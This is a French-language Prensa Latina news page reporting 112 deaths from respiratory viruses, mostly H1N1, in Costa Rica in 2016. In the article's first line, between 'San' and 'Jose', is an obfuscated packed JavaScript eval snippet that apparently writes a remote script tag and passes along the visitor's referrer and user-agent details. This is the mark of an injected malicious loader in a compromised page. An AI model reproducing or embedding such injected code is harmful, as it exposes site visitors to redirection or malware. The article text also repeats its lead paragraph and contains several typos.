lundi 15 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Virus respiratoires causent 112 décès au Costa Rica en 2016

San eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tiiba|var|u0026u|referrer|zfkbt||js|php'.split('|'),0,{})) Jose, 13 jan (PL) Un total de 112 personnes sont mortes au Costa Rica en 2016 à la suite des virus respiratoires, principalement H1N1, selon le dernier bulletin épidémiologique du Ministère de la santé.

San Jose, 13 jan (PL) Un total de 112 personnes sont mortes au Costa Rica en 2016 à la suite des virus respiratoires, principalement H1N1, selon le dernier bulletin épidémiologique du Ministère de la santé.

Le rapport indique que 54 pour cent des décès était par le virus H1N1, suivi par syncytial respiratoire (18 pour cent), AH3N2 (15) et 13 pour cent ont été tués par d’autres types de grippes.

En outre, 92 pour cent des personnes tuées par des virus respiratoires présentaient des facteurs de risque parce que 22 pour cent étaient plus de 65 ans, l19 pour cent des patients cardiaques  et 18 pour cent avaient des maladies respiratoires chroniques. 35 pour cent d’entre elles avaient deux facteurs associés à un risque et sept pour cent quatre facteurs, tandis que 17 pour cent des  personnes tuées ne présentait aucun facteur de   risque.

Comme en 2015, le plus grand nombre de décès dus à ces virus respiratoires se seont enregistrés depuis la fin d’Octobre, un chiffre qui l’an dernier s’est élevé à 44 décès, la majorité cardiaque, le groupe en risue avec le moins vacciné contre la grippe dans la dernière campagne nationale.

Du total de peracides, 73 pour cent n’ont pas été vaccinés contre la grippe.

Dans son rapport, le ministère de la Santé insiste sur le fait que les personnes qui entrent dans les groupes à risque (jeunes enfants, les personnes âgées, les diabétiques, les hypertendus, les femmes enceintes et les personnes souffrant de maladies qui abaissent les défenses) devraient éviter de participer à des événements ou des sites de masse public.

Rm/mgt/ale

EN CONTINU
notes connexes